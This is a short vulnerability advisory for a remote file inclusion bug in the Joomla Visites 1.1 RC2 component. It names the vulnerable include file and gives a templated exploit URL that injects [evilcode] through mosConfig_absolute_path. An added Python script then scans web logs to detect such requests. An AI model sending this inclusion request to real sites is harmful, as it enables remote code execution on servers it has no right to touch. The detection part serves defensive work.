Joomla Visites 1.1 RC2 - RFI


[o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability
Software : com_joomla-visites version 1.1 RC2
Vendor : http://www.joomla-visites.net/
Author : NoGe


[o] Vulnerable file
administrator/components/com_joomla-visites/core/include/myMailer.class.php
require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';


[o] Exploit
http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/5497
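
[o] Detection (added example, not part of the original advisory)
The script below flags access-log requests that set mosConfig_absolute_path on the vulnerable file, rating a value that starts with a URL scheme as high severity. The combined log format, the severity labels and the sample lines are assumptions made for this example.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# File and parameter named in the advisory above (path lowercased for matching).
VULN_FILE = "/administrator/components/com_joomla-visites/core/include/mymailer.class.php"
PARAM = "mosConfig_absolute_path"

# Assumption: Apache/nginx "combined" access log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value starting with a URL scheme points the include path off-host.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify(line):
    """Return a finding dict if the request sets PARAM on the vulnerable file, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = posixpath.normpath(unquote(parts.path)).lower()
    if not path.endswith(VULN_FILE):
        return None
    # parse_qsl percent-decodes keys and values. Only the query string is
    # visible in an access log; POST bodies and cookies are not covered.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == PARAM:
            remote = bool(SCHEME_RE.match(value.strip()))
            return {"ip": m["ip"], "status": int(m["status"]),
                    "value": value, "severity": "high" if remote else "medium"}
    return None


def scan(lines):
    """Classify every line and keep the findings."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
_F = "/joomla/administrator/components/com_joomla-visites/core/include/myMailer.class.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/May/2008:10:01:02 +0000] "GET {_F}?{PARAM}=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 200 512 "-" "-"',
    f'198.51.100.4 - - [10/May/2008:10:05:40 +0000] "GET {_F}?{PARAM}=/var/www/joomla HTTP/1.1" 500 0 "-" "-"',
    '192.0.2.10 - - [10/May/2008:10:06:11 +0000] "GET /joomla/index.php?option=com_content HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any hit is worth reviewing, since this include file is not meant to be requested directly.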

